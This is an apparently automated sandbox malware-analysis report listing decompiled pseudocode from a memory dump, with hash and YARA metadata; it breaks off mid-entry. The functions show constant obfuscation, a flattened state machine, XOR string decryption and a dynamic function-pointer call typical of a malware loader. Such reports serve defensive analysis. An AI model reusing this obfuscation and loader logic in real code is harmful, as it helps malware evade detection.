                                          0x006d893f
                                          0x006d894a
                                          0x006d8959
                                          0x006d895b
                                          0x006d8963
                                          0x006d896a
                                          0x006d897b
                                          0x006d8980
                                          0x006d8982
                                          0x006d8986
                                          0x006d8986
                                          0x006d8988
                                          0x006d898b
                                          0x006d8990
                                          0x006d8998
                                          0x006d899e
                                          0x006d89a2
                                          0x006d89ab
                                          0x006d89ac
                                          0x006d89b3
                                          0x006d89b7
                                          0x006d89bb
                                          0x006d89bb
                                          0x006d89c5
                                          0x006d89c5
                                          0x006d89d2

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: Q`${K
                                          • API String ID: 0-3942002812
                                          • Opcode ID: 66a8dc07c374e087d51075cc4997c9489b13b1686e8462a41ad67111226f3164
                                          • Instruction ID: 84b7e84890f709048890e93b8b063e7825330f56e8e7527c4cc999e3b63142df
                                          • Opcode Fuzzy Hash: 66a8dc07c374e087d51075cc4997c9489b13b1686e8462a41ad67111226f3164
                                          • Instruction Fuzzy Hash: D531AD72A087118FD314DF29C48456BF7E1FF88318F454A6EE489AB250D774E90A8B96
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D878F, Relevance: 2.6, Strings: 2, Instructions: 86COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 91%
                                          			E006D878F(void* __ecx, void* __edx, void* __eflags) {
				signed int* _t40;
				signed int _t42;
				unsigned int* _t55;
				signed int _t56;
				signed int _t58;
				signed int _t65;
				unsigned int _t66;
				unsigned int _t67;
				unsigned int* _t70;
				signed int* _t71;
				signed int* _t72;
				unsigned int _t74;
				void* _t80;
				void* _t82;
				void* _t84;
				void* _t85;

				_push( *((intOrPtr*)(_t84 + 0x18)));
				_push( *(_t84 + 0x24));
				_push(__ecx);
				_t40 = E006C602B( *((intOrPtr*)(_t84 + 0x18)));
				 *(_t84 + 0x34) = 0x2399;
				_t4 =  &(_t40[1]); // 0x4
				_t71 = _t4;
				 *(_t84 + 0x34) =  *(_t84 + 0x34) ^ 0xb4bbd3b6;
				 *(_t84 + 0x34) =  *(_t84 + 0x34) + 0xfffffbe3;
				 *(_t84 + 0x34) =  *(_t84 + 0x34) ^ 0xb4bbb717;
				 *(_t84 + 0x20) = 0xf668;
				 *(_t84 + 0x20) =  *(_t84 + 0x20) | 0x7255987b;
				 *(_t84 + 0x20) =  *(_t84 + 0x20) ^ 0x7255e635;
				 *(_t84 + 0x1c) = 0x6aea;
				 *(_t84 + 0x1c) =  *(_t84 + 0x1c) + 0xffff3e88;
				 *(_t84 + 0x1c) =  *(_t84 + 0x1c) ^ 0xffff96c8;
				_t58 =  *_t40;
				_t72 =  &(_t71[1]);
				_t42 =  *_t71 ^ _t58;
				 *(_t84 + 0x24) = _t58;
				 *(_t84 + 0x28) = _t42;
				_t23 = _t42 + 1; // 0x1
				_t74 =  !=  ? (_t23 & 0xfffffffc) + 4 : _t23;
				_t85 = _t84 + 8;
				_t55 = E006C8736(_t74);
				 *(_t85 + 0x2c) = _t55;
				if(_t55 != 0) {
					_t82 = 0;
					_t70 = _t55;
					_t80 =  >  ? 0 :  &(_t72[_t74 >> 2]) - _t72 + 3 >> 2;
					if(_t80 != 0) {
						_t56 =  *(_t85 + 0x18);
						do {
							_t65 =  *_t72;
							_t72 =  &(_t72[1]);
							_t66 = _t65 ^ _t56;
							 *_t70 = _t66;
							_t70 =  &(_t70[1]);
							_t67 = _t66 >> 0x10;
							 *((char*)(_t70 - 3)) = _t66 >> 8;
							 *(_t70 - 2) = _t67;
							_t82 = _t82 + 1;
							 *((char*)(_t70 - 1)) = _t67 >> 8;
						} while (_t82 < _t80);
						_t55 =  *(_t85 + 0x28);
					}
					 *((char*)(_t55 +  *((intOrPtr*)(_t85 + 0x1c)))) = 0;
				}
				return _t55;
			}



















                                          0x006d8799
                                          0x006d879a
                                          0x006d879f
                                          0x006d87a0
                                          0x006d87a5
                                          0x006d87ad
                                          0x006d87ad
                                          0x006d87b0
                                          0x006d87b8
                                          0x006d87c0
                                          0x006d87c8
                                          0x006d87d0
                                          0x006d87d8
                                          0x006d87e0
                                          0x006d87e8
                                          0x006d87f0
                                          0x006d87f8
                                          0x006d87fc
                                          0x006d87ff
                                          0x006d8801
                                          0x006d8805
                                          0x006d8809
                                          0x006d8819
                                          0x006d8824
                                          0x006d8832
                                          0x006d8834
                                          0x006d883c
                                          0x006d8844
                                          0x006d8846
                                          0x006d8857
                                          0x006d885c
                                          0x006d885e
                                          0x006d8862
                                          0x006d8862
                                          0x006d8864
                                          0x006d8867
                                          0x006d8869
                                          0x006d8870
                                          0x006d8873
                                          0x006d8876
                                          0x006d8879
                                          0x006d887f
                                          0x006d8880
                                          0x006d8883
                                          0x006d8887
                                          0x006d8887
                                          0x006d8890
                                          0x006d8890
                                          0x006d889c

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 5Ur$j
                                          • API String ID: 0-2435424154
                                          • Opcode ID: 3cdccfe5cfbb9caf67aa2b6a7def77af1c161ee780fa92b2d2a055404a860934
                                          • Instruction ID: 88021e26827a0ead32c3d74245ac7dce709d2bb4d6c1cd2dd03da5c7633a882b
                                          • Opcode Fuzzy Hash: 3cdccfe5cfbb9caf67aa2b6a7def77af1c161ee780fa92b2d2a055404a860934
                                          • Instruction Fuzzy Hash: 9031CC72A093018FD314CF28C88585BFBE1EF88714F454B5EE989A7351C734E90ACB96
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D9586, Relevance: 2.6, Strings: 2, Instructions: 79COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 64%
                                          			E006D9586(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _t78;
				void* _t80;
				intOrPtr* _t81;
				intOrPtr _t95;

				_v40 = _v40 & 0x00000000;
				_v44 = 0x5b9444;
				_v12 = 0xdcba;
				_v12 = _v12 >> 4;
				_v12 = _v12 >> 4;
				_v12 = _v12 + 0x949;
				_v12 = _v12 ^ 0x00001af4;
				_v8 = 0x3cb;
				_v8 = _v8 + 0xffff192d;
				_v8 = _v8 + 0x1519;
				_v8 = _v8 ^ 0xffff4a83;
				_v20 = 0x60da;
				_v20 = _v20 >> 4;
				_t95 = _a4;
				_v20 = _v20 * 0x71;
				_v20 = _v20 ^ 0x0002f52e;
				_v24 = 0x45f5;
				_v24 = _v24 ^ 0x8ddfc3a3;
				_v24 = _v24 | 0x63507c9c;
				_v24 = _v24 ^ 0xefdfb5dc;
				_v32 = 0xfa49;
				_v32 = _v32 ^ 0xb8265659;
				_v32 = _v32 ^ 0xb826ab18;
				_v28 = 0xa34;
				_v28 = _v28 | 0x478cb459;
				_v28 = _v28 ^ 0x0d1ea304;
				_v28 = _v28 ^ 0x4a9200da;
				_v36 = 0x43f7;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 ^ 0x00001d3e;
				_v16 = 0x9c5f;
				_v16 = _v16 * 0x1d;
				_v16 = _v16 * 0x2e;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x65dacbc4;
				_t78 =  *((intOrPtr*)(_t95 + 4))( *((intOrPtr*)(_t95 + 0x28)), 1, 0);
				_t98 = _t78;
				if(_t78 != 0) {
					_push(0x6dc860);
					_push(_v20);
					_t80 = E006D878F(_v12, _v8, _t98);
					_push(_v32);
					_t93 = _t80;
					_push(_v24);
					_t81 = E006D6965(_t80,  *((intOrPtr*)(_t95 + 0x28)));
					if(_t81 != 0) {
						 *_t81();
					}
					E006D2025(_v28, _t93, _v36, _v16);
				}
				return 0;
			}

















                                          0x006d958c
                                          0x006d9590
                                          0x006d9597
                                          0x006d959e
                                          0x006d95a2
                                          0x006d95a6
                                          0x006d95ad
                                          0x006d95b4
                                          0x006d95bb
                                          0x006d95c2
                                          0x006d95cf
                                          0x006d95d6
                                          0x006d95dd
                                          0x006d95e6
                                          0x006d95ed
                                          0x006d95f0
                                          0x006d95f7
                                          0x006d95fe
                                          0x006d9605
                                          0x006d960c
                                          0x006d9613
                                          0x006d961a
                                          0x006d9621
                                          0x006d9628
                                          0x006d962f
                                          0x006d9636
                                          0x006d963d
                                          0x006d9644
                                          0x006d964b
                                          0x006d964f
                                          0x006d9656
                                          0x006d9661
                                          0x006d9668
                                          0x006d966b
                                          0x006d966f
                                          0x006d9679
                                          0x006d967c
                                          0x006d967e
                                          0x006d9681
                                          0x006d9686
                                          0x006d968f
                                          0x006d9694
                                          0x006d9697
                                          0x006d9699
                                          0x006d96a1
                                          0x006d96ab
                                          0x006d96ad
                                          0x006d96ad
                                          0x006d96ba
                                          0x006d96c1
                                          0x006d96c8

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 4$I
                                          • API String ID: 0-2585635819
                                          • Opcode ID: a24bb9846c83ca912a6058a7247433eee34a5bc889b5bf13f41be7932073bb1e
                                          • Instruction ID: 95abb36557c6b27d441ff77059067bc9a7734d2ba055dacfcca5a2f2255a5661
                                          • Opcode Fuzzy Hash: a24bb9846c83ca912a6058a7247433eee34a5bc889b5bf13f41be7932073bb1e
                                          • Instruction Fuzzy Hash: AA4111B1D0020AABEF04CFA1C94AAEEBBB1FB44314F208159D411B6290D3B9AB55CF95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006C7998, Relevance: 2.6, Strings: 2, Instructions: 74COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E006C7998(void* __ecx, void* __edx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t74;
				intOrPtr _t83;
				signed int _t85;
				signed int _t86;
				signed int _t96;
				intOrPtr* _t97;

				_t97 = _a4;
				_push(_a12);
				_t96 = _a8;
				_push(_t96);
				_push(_t97);
				E006C602B(_t74);
				_v24 = 0x43bd;
				_v24 = _v24 >> 0xe;
				_v24 = _v24 ^ 0x00002257;
				_v20 = 0xfb35;
				_v20 = _v20 ^ 0x316dcd7c;
				_v20 = _v20 ^ 0x316d5b09;
				_v8 = 0x86ca;
				_t85 = 0x26;
				_v8 = _v8 / _t85;
				_v8 = _v8 + 0xffffb56c;
				_v8 = _v8 ^ 0xffffa5a2;
				_a4 = 0x6ea8;
				_a4 = _a4 | 0xeb58ef4a;
				_a4 = _a4 << 6;
				_t86 = 0x7d;
				_a4 = _a4 / _t86;
				_a4 = _a4 ^ 0x01b6ec6f;
				_v16 = 0xf7ce;
				_v16 = _v16 + 0xffffb713;
				_v16 = _v16 + 0xe2af;
				_v16 = _v16 ^ 0x0001a1e1;
				_v12 = 0x7f90;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x9419cfce;
				_v12 = _v12 ^ 0x9419fbb9;
				_a8 = 0xab6f;
				_a8 = _a8 * 0x2a;
				_a8 = _a8 >> 0xf;
				_a8 = _a8 | 0x38dd753e;
				_a8 = _a8 ^ 0x38dd1846;
				E006D360F(_t96, _v24, _v20,  *((intOrPtr*)(_t97 + 4)), _v8);
				E006D2674(_a4, _v16,  *((intOrPtr*)(_t97 + 4)),  *((intOrPtr*)(_t96 + 0x34)), _v12, _a8,  *_t97);
				_t83 =  *((intOrPtr*)(_t97 + 4));
				 *((intOrPtr*)(_t96 + 0x34)) =  *((intOrPtr*)(_t96 + 0x34)) + _t83;
				return _t83;
			}














                                          0x006c799f
                                          0x006c79a3
                                          0x006c79a6
                                          0x006c79a9
                                          0x006c79aa
                                          0x006c79ad
                                          0x006c79b2
                                          0x006c79bb
                                          0x006c79bf
                                          0x006c79c6
                                          0x006c79cd
                                          0x006c79d4
                                          0x006c79db
                                          0x006c79e7
                                          0x006c79ec
                                          0x006c79f1
                                          0x006c79f8
                                          0x006c79ff
                                          0x006c7a06
                                          0x006c7a0d
                                          0x006c7a14
                                          0x006c7a19
                                          0x006c7a1c
                                          0x006c7a23
                                          0x006c7a2a
                                          0x006c7a31
                                          0x006c7a38
                                          0x006c7a3f
                                          0x006c7a46
                                          0x006c7a4a
                                          0x006c7a51
                                          0x006c7a58
                                          0x006c7a63
                                          0x006c7a66
                                          0x006c7a6a
                                          0x006c7a71
                                          0x006c7a84
                                          0x006c7a9d
                                          0x006c7aa2
                                          0x006c7aa8
                                          0x006c7ab0

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: [m1$JX
                                          • API String ID: 0-848362422
                                          • Opcode ID: 753b8a0fce25be50dec76d604cb7334f1ed1f8c12209d0cf9d880ad97dc86ea5
                                          • Instruction ID: ec1ef828e1802be88bf6a0db5ccab955f4d112329d5856be894fe8a39cd7547e
                                          • Opcode Fuzzy Hash: 753b8a0fce25be50dec76d604cb7334f1ed1f8c12209d0cf9d880ad97dc86ea5
                                          • Instruction Fuzzy Hash: F3310476900309FBCF58CFA5D94A89EBBB2FF44314F20C059E9196A260D3799B24DF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006C9A37, Relevance: 1.6, Strings: 1, Instructions: 320COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 97%
                                          			E006C9A37(void* __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				char _v196;
				void* _t297;
				signed int _t335;
				signed int* _t340;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				char* _t354;
				void* _t380;
				void* _t381;
				void* _t382;
				void* _t383;
				void* _t386;

				_push(_a8);
				_t340 = __edx;
				_t380 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006C602B(_t297);
				_v24 = 0xc44;
				_t383 = _t382 + 0x10;
				_v24 = _v24 << 2;
				_v24 = _v24 << 5;
				_t381 = 0x108b8bb2;
				_v24 = _v24 >> 1;
				_v24 = _v24 ^ 0x0003068b;
				_v96 = 0x3b9e;
				_v96 = _v96 ^ 0x893884c8;
				_v96 = _v96 ^ 0x89388972;
				_v48 = 0x8b0e;
				_v48 = _v48 << 6;
				_v48 = _v48 + 0xffffd606;
				_t342 = 0x6d;
				_v48 = _v48 * 0x69;
				_v48 = _v48 ^ 0x0e30afa5;
				_v76 = 0xbb1c;
				_v76 = _v76 + 0xffff2a80;
				_v76 = _v76 | 0x384e25df;
				_v76 = _v76 ^ 0xffffbccb;
				_v68 = 0x817b;
				_v68 = _v68 + 0xb36b;
				_v68 = _v68 * 0x62;
				_v68 = _v68 ^ 0x00761722;
				_v112 = 0x78f7;
				_v112 = _v112 + 0xabd9;
				_v112 = _v112 ^ 0x00010bcc;
				_v64 = 0xef7a;
				_v64 = _v64 * 0x6b;
				_v64 = _v64 >> 6;
				_v64 = _v64 ^ 0x0001bb5c;
				_v104 = 0x32c;
				_v104 = _v104 << 5;
				_v104 = _v104 ^ 0x00002d3d;
				_v52 = 0x7426;
				_v52 = _v52 * 0x5d;
				_v52 = _v52 ^ 0xa80e6da6;
				_v52 = _v52 / _t342;
				_v52 = _v52 ^ 0x018aaa04;
				_v12 = 0xd0fb;
				_t343 = 0x6a;
				_v12 = _v12 / _t343;
				_v12 = _v12 + 0xffff7920;
				_v12 = _v12 + 0xffff83ce;
				_v12 = _v12 ^ 0xfffec2a6;
				_v108 = 0xe89;
				_v108 = _v108 + 0x85a8;
				_v108 = _v108 ^ 0x0000adac;
				_v92 = 0xd004;
				_v92 = _v92 + 0xffff90ab;
				_v92 = _v92 | 0x2bfbb4c5;
				_v92 = _v92 ^ 0x2bfba16d;
				_v8 = 0x51d1;
				_v8 = _v8 ^ 0x91ec542a;
				_v8 = _v8 | 0xbd5d6296;
				_v8 = _v8 + 0xe80e;
				_v8 = _v8 ^ 0xbdfe1041;
				_v40 = 0xc5fc;
				_v40 = _v40 | 0x331e7523;
				_v40 = _v40 + 0xc476;
				_v40 = _v40 | 0xe5b13554;
				_v40 = _v40 ^ 0xf7bfa45a;
				_v116 = 0x6d98;
				_v116 = _v116 >> 0xf;
				_v116 = _v116 ^ 0x000044aa;
				_v88 = 0x7357;
				_v88 = _v88 + 0x7cff;
				_t344 = 0x6e;
				_v88 = _v88 * 0x25;
				_v88 = _v88 ^ 0x0022e11b;
				_v56 = 0x39e0;
				_v56 = _v56 + 0xffffb0fb;
				_v56 = _v56 << 6;
				_v56 = _v56 ^ 0xfffab6b2;
				_v44 = 0x2257;
				_v44 = _v44 / _t344;
				_v44 = _v44 + 0x17fe;
				_v44 = _v44 + 0xffff4b8e;
				_v44 = _v44 ^ 0xffff3a3c;
				_v16 = 0xac11;
				_t345 = 0xd;
				_v16 = _v16 / _t345;
				_t346 = 0x22;
				_v16 = _v16 / _t346;
				_v16 = _v16 + 0xffff8051;
				_v16 = _v16 ^ 0xffffec84;
				_v32 = 0x207e;
				_v32 = _v32 + 0xffff85d9;
				_v32 = _v32 | 0x92dc0f10;
				_t347 = 0x3d;
				_v32 = _v32 * 0x4f;
				_v32 = _v32 ^ 0xffe76a4a;
				_v72 = 0xf5a4;
				_v72 = _v72 << 9;
				_v72 = _v72 + 0x6505;
				_v72 = _v72 ^ 0x01ebcff4;
				_v124 = 0xf81;
				_v124 = _v124 + 0x174a;
				_v124 = _v124 ^ 0x00005562;
				_v80 = 0xd566;
				_v80 = _v80 << 0xd;
				_v80 = _v80 << 0xa;
				_v80 = _v80 ^ 0xb30025af;
				_v20 = 0xd4e9;
				_v20 = _v20 ^ 0x0ea0d6e7;
				_v20 = _v20 / _t347;
				_v20 = _v20 | 0xf8279f10;
				_v20 = _v20 ^ 0xf83fc9b3;
				_v100 = 0xda9a;
				_v100 = _v100 * 3;
				_v100 = _v100 ^ 0x0002f5f9;
				_v36 = 0x78aa;
				_v36 = _v36 + 0x4117;
				_v36 = _v36 >> 0xa;
				_v36 = _v36 | 0x25804fa7;
				_v36 = _v36 ^ 0x25803510;
				_v28 = 0x20d5;
				_v28 = _v28 + 0xfab3;
				_v28 = _v28 | 0xa4f7c20c;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x149e8671;
				_v60 = 0x9445;
				_v60 = _v60 | 0xc2ce9f5c;
				_v60 = _v60 ^ 0x46e2878d;
				_v60 = _v60 ^ 0x842c5375;
				_v120 = 0x3512;
				_v120 = _v120 << 9;
				_v120 = _v120 ^ 0x006a5627;
				_v84 = 0xeb51;
				_v84 = _v84 * 0x42;
				_v84 = _v84 >> 0xf;
				_v84 = _v84 ^ 0x000027de;
				goto L1;
				do {
					while(1) {
						L1:
						_t386 = _t381 - 0x1e9793a2;
						if(_t386 > 0) {
							break;
						}
						if(_t386 == 0) {
							E006C7998(_v100, _v36, __eflags, _t380 + 0x20,  &_v196, _v28);
							_t383 = _t383 + 0xc;
							_t381 = 0x39ecd3df;
							continue;
						} else {
							if(_t381 == 0xaa31e0c) {
								E006C7998(_v124, _v80, __eflags, _t380 + 0x18,  &_v196, _v20);
								_t383 = _t383 + 0xc;
								_t381 = 0x1e9793a2;
								continue;
							} else {
								if(_t381 == 0x108b8bb2) {
									 *_t340 =  *_t340 & 0x00000000;
									_t381 = 0x23e4e38d;
									_t340[1] = _t340[1] & 0x00000000;
									continue;
								} else {
									if(_t381 == 0x15969886) {
										_t354 =  &_v196;
										E006D360F(_t354, _v12, _v108,  *((intOrPtr*)(_t380 + 8)), _v92);
										_t383 = _t383 + 0xc;
										_t381 = 0x15fd630a;
										continue;
									} else {
										if(_t381 == 0x15fd630a) {
											_t354 =  &_v196;
											E006D360F(_t354, _v8, _v40,  *((intOrPtr*)(_t380 + 0xc)), _v116);
											_t383 = _t383 + 0xc;
											_t381 = 0x2ea6dd43;
											continue;
										} else {
											if(_t381 == 0x18d3ef4a) {
												_push(_t354);
												_t335 = E006C8736(_t340[1]);
												 *_t340 = _t335;
												_t354 = _t354;
												__eflags = _t335;
												if(__eflags != 0) {
													_t381 = 0x22e1be53;
													continue;
												}
											} else {
												if(_t381 != 0x1a35bcc9) {
													goto L28;
												} else {
													_t354 =  &_v196;
													E006D360F(_t354, _v16, _v32,  *((intOrPtr*)(_t380 + 0x14)), _v72);
													_t383 = _t383 + 0xc;
													_t381 = 0xaa31e0c;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L23:
						__eflags =  *_t340;
						_t282 =  *_t340 != 0;
						__eflags = _t282;
						return 0 | _t282;
					}
					__eflags = _t381 - 0x22e1be53;
					if(_t381 == 0x22e1be53) {
						E006D50F2( &_v196, _v76, _v68, _v112, _t340);
						_t383 = _t383 + 0xc;
						_t381 = 0x2d15c716;
						goto L28;
					} else {
						__eflags = _t381 - 0x23e4e38d;
						if(_t381 == 0x23e4e38d) {
							_t340[1] = E006D7F1F(_t380);
							_t381 = 0x18d3ef4a;
							goto L1;
						} else {
							__eflags = _t381 - 0x2d15c716;
							if(__eflags == 0) {
								E006C7998(_v64, _v104, __eflags, _t380,  &_v196, _v52);
								_t383 = _t383 + 0xc;
								_t381 = 0x15969886;
								goto L1;
							} else {
								__eflags = _t381 - 0x2ea6dd43;
								if(_t381 == 0x2ea6dd43) {
									E006D360F( &_v196, _v88, _v56,  *((intOrPtr*)(_t380 + 0x10)), _v44);
									_t383 = _t383 + 0xc;
									_t381 = 0x1a35bcc9;
									goto L1;
								} else {
									__eflags = _t381 - 0x39ecd3df;
									if(_t381 != 0x39ecd3df) {
										goto L28;
									} else {
										E006D360F( &_v196, _v60, _v120,  *((intOrPtr*)(_t380 + 0x28)), _v84);
									}
								}
							}
						}
					}
					goto L23;
					L28:
					__eflags = _t381 - 0x1d48367e;
				} while (__eflags != 0);
				goto L23;
			}

















































                                          0x006c9a43
                                          0x006c9a46
                                          0x006c9a48
                                          0x006c9a4a
                                          0x006c9a4d
                                          0x006c9a4e
                                          0x006c9a4f
                                          0x006c9a54
                                          0x006c9a5b
                                          0x006c9a5e
                                          0x006c9a64
                                          0x006c9a68
                                          0x006c9a6d
                                          0x006c9a70
                                          0x006c9a77
                                          0x006c9a7e
                                          0x006c9a85
                                          0x006c9a8c
                                          0x006c9a93
                                          0x006c9a97
                                          0x006c9aa4
                                          0x006c9aa7
                                          0x006c9aaa
                                          0x006c9ab1
                                          0x006c9ab8
                                          0x006c9abf
                                          0x006c9ac6
                                          0x006c9acd
                                          0x006c9ad4
                                          0x006c9adf
                                          0x006c9ae2
                                          0x006c9ae9
                                          0x006c9af0
                                          0x006c9af7
                                          0x006c9afe
                                          0x006c9b09
                                          0x006c9b0c
                                          0x006c9b10
                                          0x006c9b17
                                          0x006c9b1e
                                          0x006c9b22
                                          0x006c9b29
                                          0x006c9b34
                                          0x006c9b37
                                          0x006c9b45
                                          0x006c9b48
                                          0x006c9b4f
                                          0x006c9b59
                                          0x006c9b5c
                                          0x006c9b5f
                                          0x006c9b66
                                          0x006c9b6d
                                          0x006c9b74
                                          0x006c9b7b
                                          0x006c9b82
                                          0x006c9b89
                                          0x006c9b90
                                          0x006c9b97
                                          0x006c9b9e
                                          0x006c9ba5
                                          0x006c9bac
                                          0x006c9bb3
                                          0x006c9bba
                                          0x006c9bc1
                                          0x006c9bc8
                                          0x006c9bcf
                                          0x006c9bd6
                                          0x006c9bdf
                                          0x006c9be6
                                          0x006c9bed
                                          0x006c9bf4
                                          0x006c9bf8
                                          0x006c9bff
                                          0x006c9c06
                                          0x006c9c13
                                          0x006c9c16
                                          0x006c9c19
                                          0x006c9c20
                                          0x006c9c27
                                          0x006c9c2e
                                          0x006c9c32
                                          0x006c9c39
                                          0x006c9c47
                                          0x006c9c4a
                                          0x006c9c51
                                          0x006c9c58
                                          0x006c9c5f
                                          0x006c9c69
                                          0x006c9c6e
                                          0x006c9c76
                                          0x006c9c7b
                                          0x006c9c80
                                          0x006c9c87
                                          0x006c9c8e
                                          0x006c9c95
                                          0x006c9c9c
                                          0x006c9ca7
                                          0x006c9ca8
                                          0x006c9cab
                                          0x006c9cb2
                                          0x006c9cb9
                                          0x006c9cbd
                                          0x006c9cc4
                                          0x006c9ccb
                                          0x006c9cd2
                                          0x006c9cd9
                                          0x006c9ce0
                                          0x006c9ce7
                                          0x006c9ceb
                                          0x006c9cef
                                          0x006c9cf6
                                          0x006c9cfd
                                          0x006c9d09
                                          0x006c9d0c
                                          0x006c9d13
                                          0x006c9d1a
                                          0x006c9d25
                                          0x006c9d28
                                          0x006c9d2f
                                          0x006c9d36
                                          0x006c9d3d
                                          0x006c9d41
                                          0x006c9d48
                                          0x006c9d4f
                                          0x006c9d56
                                          0x006c9d5d
                                          0x006c9d64
                                          0x006c9d68
                                          0x006c9d6f
                                          0x006c9d76
                                          0x006c9d7d
                                          0x006c9d84
                                          0x006c9d8b
                                          0x006c9d92
                                          0x006c9d96
                                          0x006c9d9d
                                          0x006c9da8
                                          0x006c9dab
                                          0x006c9daf
                                          0x006c9daf
                                          0x006c9db6
                                          0x006c9db6
                                          0x006c9db6
                                          0x006c9db6
                                          0x006c9dbc
                                          0x00000000
                                          0x00000000
                                          0x006c9dc2
                                          0x006c9ee5
                                          0x006c9eea
                                          0x006c9eed
                                          0x00000000
                                          0x006c9dc8
                                          0x006c9dce
                                          0x006c9ebf
                                          0x006c9ec4
                                          0x006c9ec7
                                          0x00000000
                                          0x006c9dd4
                                          0x006c9dda
                                          0x006c9e9a
                                          0x006c9e9d
                                          0x006c9ea2
                                          0x00000000
                                          0x006c9de0
                                          0x006c9de6
                                          0x006c9e79
                                          0x006c9e88
                                          0x006c9e8d
                                          0x006c9e90
                                          0x00000000
                                          0x006c9dec
                                          0x006c9df2
                                          0x006c9e55
                                          0x006c9e64
                                          0x006c9e69
                                          0x006c9e6c
                                          0x00000000
                                          0x006c9df4
                                          0x006c9dfa
                                          0x006c9e32
                                          0x006c9e37
                                          0x006c9e3c
                                          0x006c9e3f
                                          0x006c9e40
                                          0x006c9e42
                                          0x006c9e48
                                          0x00000000
                                          0x006c9e48
                                          0x006c9dfc
                                          0x006c9e02
                                          0x00000000
                                          0x006c9e08
                                          0x006c9e0b
                                          0x006c9e1a
                                          0x006c9e1f
                                          0x006c9e22
                                          0x00000000
                                          0x006c9e22
                                          0x006c9e02
                                          0x006c9dfa
                                          0x006c9df2
                                          0x006c9de6
                                          0x006c9dda
                                          0x006c9dce
                                          0x006c9f45
                                          0x006c9f47
                                          0x006c9f4b
                                          0x006c9f4b
                                          0x006c9f52
                                          0x006c9f52
                                          0x006c9ef7
                                          0x006c9efd
                                          0x006c9fbe
                                          0x006c9fc3
                                          0x006c9fc6
                                          0x00000000
                                          0x006c9f03
                                          0x006c9f03
                                          0x006c9f09
                                          0x006c9fa1
                                          0x006c9fa4
                                          0x00000000
                                          0x006c9f0f
                                          0x006c9f0f
                                          0x006c9f15
                                          0x006c9f88
                                          0x006c9f8d
                                          0x006c9f90
                                          0x00000000
                                          0x006c9f17
                                          0x006c9f17
                                          0x006c9f1d
                                          0x006c9f65
                                          0x006c9f6a
                                          0x006c9f6d
                                          0x00000000
                                          0x006c9f1f
                                          0x006c9f1f
                                          0x006c9f25
                                          0x00000000
                                          0x006c9f2b
                                          0x006c9f3d
                                          0x006c9f42
                                          0x006c9f25
                                          0x006c9f1d
                                          0x006c9f15
                                          0x006c9f09
                                          0x00000000
                                          0x006c9fcb
                                          0x006c9fcb
                                          0x006c9fcb
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 'Vj
                                          • API String ID: 0-2210790371
                                          • Opcode ID: 752dd2814c582dd95a6ec796e85cdc249e3cc29c0e69a297da20739e8b56e3d6
